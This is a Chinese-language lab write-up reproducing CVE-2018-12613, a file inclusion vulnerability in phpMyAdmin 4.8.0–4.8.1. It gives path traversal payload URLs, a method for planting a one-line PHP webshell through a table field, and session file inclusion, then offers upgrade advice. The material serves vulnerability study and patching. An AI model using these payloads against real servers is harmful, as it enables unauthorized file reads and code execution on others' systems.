CVE-2018-12613phpMyAdmin文件包含漏洞复现
2021-01-05 18:40:44 Author: www.freebuf.com(查看原文) 阅读量:165 收藏

0x00简介

phpMyAdmin 是一个以PHP为基础,以Web-Base方式架构在网站主机上的MySQL的数据库管理工具,让管理者可用Web接口管理MySQL数据库。借由此Web接口可以成为一个简易方式输入繁杂SQL语法的较佳途径,尤其要处理大量资料的汇入及汇出更为方便。其中一个更大的优势在于由于phpMyAdmin跟其他PHP程式一样在网页服务器上执行,但是您可以在任何地方使用这些程式产生的HTML页面,也就是于远端管理MySQL数据库,方便的建立、修改、删除数据库及资料表。也可借由phpMyAdmin建立常用的php语法,方便编写网页时所需要的sql语法正确性。

0x01漏洞概述

攻击者利用发现在服务器上包含(查看和潜在执行)文件的漏洞。该漏洞来自一部分代码,其中页面在phpMyAdmin中被重定向和加载,以及对白名单页面进行不正确的测试。 攻击者必须经过身份验证,但在这些情况下除外:

$ cfg [‘AllowArbitraryServer’] = true:攻击者可以指定他/她已经控制的任何主机,并在phpMyAdmin上执行任意代码;

$ cfg [‘ServerDefault’] = 0:这会绕过登录并在没有任何身份验证的情况下运行易受攻击的代码。

0x02影响范围

phpMyAdmin 4.8.0

phpMyAdmin 4.8.1

0x03环境搭建

phpstudy2018+phpmyadmin4.8.1

1.下载phpstudy2018然后删除自带的phpmyadmin

下载地址:http://public.xp.cn/upgrades/PhpStudy2018.zip

2.下载phpmyadmin4.8.1版本

下载地址:https://www.phpmyadmin.net/files/

3.把下载好的phpmyadmin放入phpstudy的www目录下重新命名

4.在浏览器查看phpmyadmin的版本

http://your-IP/phpmyadmin/README

0x04漏洞复现

1.在浏览器打开phpmyadmin,需要使用账号登录进去 //略显鸡肋

2.方法一、登录进去在首页输入以下payload

http://your-ip/phpMyAdmin/index.php?target=db_datadict.php%253f/../../../../../../../../Windows\win.ini

3.在test数据库中创建一个表,然后在表中创建一个字段为一句话木马

4.在受害机查看MySQL/data对应数据库下生成一个frm文件是否写入进去,使用记事本打开

5.使用文件包含,包含此路径下的文件

http://your-ip/phpMyAdmin/index.php?target=db_datadict.php%253f/../../../../../../../../phpStudy\PHPTutorial\MySQL\data\test\demo.frm

6.方法二、通过 phpsession序列化数据保存至session文件,包含其缓存文件。通过一句话木马,进而包含sess_sessionId文件。

6.1、在最新sql语句的地方执行以下命令

select ‘<?php phpinfo() ?>’;

6.2、使用F12查看网站Session值,查看当前页面cookie中的phpmyadmin的值

6.3、使用文件包含包含此目录下的Session值的URL路径

0x05修复建议

1. 建议使用最新版本的phpmyadmin

2. 使用复杂的账号密码


文章来源: https://www.freebuf.com/vuls/259905.html
如有侵权请联系:admin#unsafe.sh